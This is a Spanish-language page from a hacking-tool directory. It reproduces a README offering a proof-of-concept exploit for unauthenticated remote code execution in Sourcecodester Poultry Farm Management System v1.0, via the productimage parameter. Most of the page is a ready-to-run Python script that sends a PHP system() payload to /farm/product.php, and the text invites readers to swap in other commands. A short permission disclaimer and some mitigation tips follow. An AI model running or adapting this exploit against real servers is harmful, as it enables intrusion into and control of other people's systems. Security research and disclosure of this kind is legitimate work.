Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-40110 — Prueba de concepto que demuestra la ejecución remota de código no autenticada en Sourcecodester Poultry Farm Management System a través del parámetro vulnerable productimage. | Kitploit
Herramientas/GitHubGitHub/abdurahmon3236/cve-2024-40110
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Prueba de concepto que demuestra la ejecución remota de código no autenticada en Sourcecodester Poultry Farm Management System a través del parámetro vulnerable productimage.

Ver Repositorio
2hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de Concepto (PoC) para Ejecución Remota de Código Sin Autenticación en Sourcecodester Poultry Farm Management System v1.0

Este repositorio contiene un script de Prueba de Concepto (PoC) que demuestra una vulnerabilidad de ejecución remota de código (RCE) sin autenticación en Sourcecodester Poultry Farm Management System v1.0. La vulnerabilidad existe en el parámetro productimage en /farm/product.php, permitiendo a un atacante ejecutar código arbitrario en el servidor.

Tabla de Contenidos

  • Descripción de la Vulnerabilidad
  • Configuración y Uso
    • Script PoC
  • Consideraciones Importantes
  • Mitigación

Descripción de la Vulnerabilidad

CVE-ID: (Pendiente)

Resumen: Sourcecodester Poultry Farm Management System v1.0 contiene una vulnerabilidad de ejecución remota de código (RCE) sin autenticación a través del parámetro en . Esta vulnerabilidad permite a un atacante ejecutar código arbitrario en el servidor sin autenticación.

productimage
/farm/product.php

Versión Afectada:

  • Sourcecodester Poultry Farm Management System v1.0

Configuración y Uso

Requisitos Previos

  • Python 3.x
  • Librería requests (pip install requests)

Script PoC

Este script demuestra cómo un atacante puede explotar la vulnerabilidad RCE enviando una solicitud maliciosa al parámetro vulnerable.

Guarde el siguiente script como rce_poc.py y ejecútelo.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

Explicación

  1. Configuración: Establezca target_url a la URL del endpoint /farm/product.php del servidor vulnerable.
  2. Payload: El payload es un payload simple de ejecución de comandos PHP. Puede modificar el payload para ejecutar diferentes comandos según sea necesario.
  3. Construir la Solicitud: El script construye una solicitud POST con el payload malicioso en el parámetro productimage.
  4. Función de Explotación: La función exploit_rce() envía la solicitud maliciosa a la URL objetivo e imprime los detalles de la respuesta.
  5. Ejecutar el Script: Cuando se ejecute, el script intentará explotar la vulnerabilidad RCE e imprimir los resultados.

Consideraciones Importantes

  • Permisos: Asegúrese de tener permiso explícito para probar esta vulnerabilidad en el sistema objetivo. Las pruebas no autorizadas son ilegales y poco éticas.
  • Entorno de Pruebas: Realice esta prueba en un entorno controlado para evitar impactar sistemas de producción.
  • Personalización del Payload: Personalice el payload según sea necesario para lograr la ejecución de comandos deseada.

Mitigación

Para mitigar esta vulnerabilidad, aplique los siguientes pasos:

  • Validación de Entrada: Implemente una validación de entrada adecuada para sanitizar las entradas del usuario.
  • Restricciones de Carga de Archivos: Restrinja las cargas de archivos para permitir solo tipos de archivos específicos y aplique límites de tamaño.
  • Actualizar Software: Actualice regularmente su software a la versión más reciente para aplicar parches y correcciones de seguridad.

Siguiendo estos pasos de mitigación y las mejores prácticas de seguridad, puede prevenir vulnerabilidades como este problema de RCE en Sourcecodester Poultry Farm Management System v1.0.

Descargar herramienta